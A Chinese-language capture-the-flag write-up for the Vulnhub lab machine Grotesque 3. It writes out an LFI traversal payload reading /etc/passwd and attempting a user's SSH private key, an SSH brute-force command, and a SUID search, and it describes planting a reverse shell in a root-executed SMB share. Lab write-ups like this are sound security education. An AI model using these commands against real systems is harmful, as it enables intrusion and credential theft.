【Vulnhub】Grotesque 3

【Vulnhub】Grotesque: 3.0.1

信息收集

fscan 扫描内网靶机ip地址为:192.168.1.2

image-20250310165814500

nmap 扫描目标IP全端口服务

image-20250310170553410

开放了 22、80 端口

dirsearch 扫描目录没什么信息

image-20250310173414429

先查看 80 web页面

image-20250310171446163

口译过来“为什么不查看一下 atlas,它将给你指明前路...”

查看页面源代码没有什么信息,点击“atlas”

image-20250310171539128

是一个图,有点像解密图

image-20250310172447364

放大后看发现解密图里面有个图卷,上面写着MD,还有五个x,意思就是md5吧

那就尝试构造一个md5字典,md5_dir.txt(等待执行几分钟)

for i in $(cat /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt); do echo $i | md5sum >> md5_dir.txt; done

我这里运行一段时间后直接卡死了。。。

image-20250310180021646

所以直接说结果吧

使用构造出来的md5字典,进行目录扫描,扫描结果出来一个f66b22bf020334b04c7d0d3eb5010391.php

访问

image-20250310180316788

无回显,页面源码也没东西,做一下模糊测试

wfuzz -u http://192.168.1.2/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../etc/passwd -w /usr/share/wordlists/dirb/big.txt --hw 0

得到 payload purpose

image-20250312150505688

漏洞利用

curl 验证一下,确实存在 LFI(文件包含漏洞)

image-20250312150615755

从 curl 回显的内容来看,存在一个权限比较高的(组为1000)的用户名freddie

利用漏洞查看一下用户的 id_rsa

curl http://192.168.9.2/f66b22bf020334b04c7d0d3eb5010391.php?purpose=/home/freddie/.ssh/id_rsa

没结果

image-20250312151703949

尝试用生成的 md5 字典去爆破 ssh

hydra -l freddie -P md5_dir.txt ssh://192.168.1.2 -t 20

目测需要相当长时间

image-20250312152133244

直接给结果:61a4e3e60c063d1e472dd780f64e6cad

ssh连接

image-20250312152309716

成功,并拿到user的flag

提权

查找 suid 程序

find / -perm -u=s -type f 2>/dev/null

image-20250312152559685

靶机开放了445端口服务

使用 smbclient 查看共享信息

smbclient -L 127.0.0.1

image-20250312154902868

可以看到开放了共享文件夹 grotesque

直接进去看看

smbclient //127.0.0.1/grotesque

image-20250312155043228

没有东西。。。

用之前的方式上传 pspy64 看看有没有定时任务

image-20250312155308911

发现 root 用户会执行 /smbshare/ 下的所有内容

image-20250312155409873

那就写一个 反弹shell

image-20250312155704341

然后进入 smb

image-20250312160050369

kali 监听 6789 端口

成功反弹,获取root shell权限

拿到 root 用户 flag

image-20250312160531430

posted @ 2025-03-14 00:06  酷比灯  阅读(10)  评论(0)    收藏  举报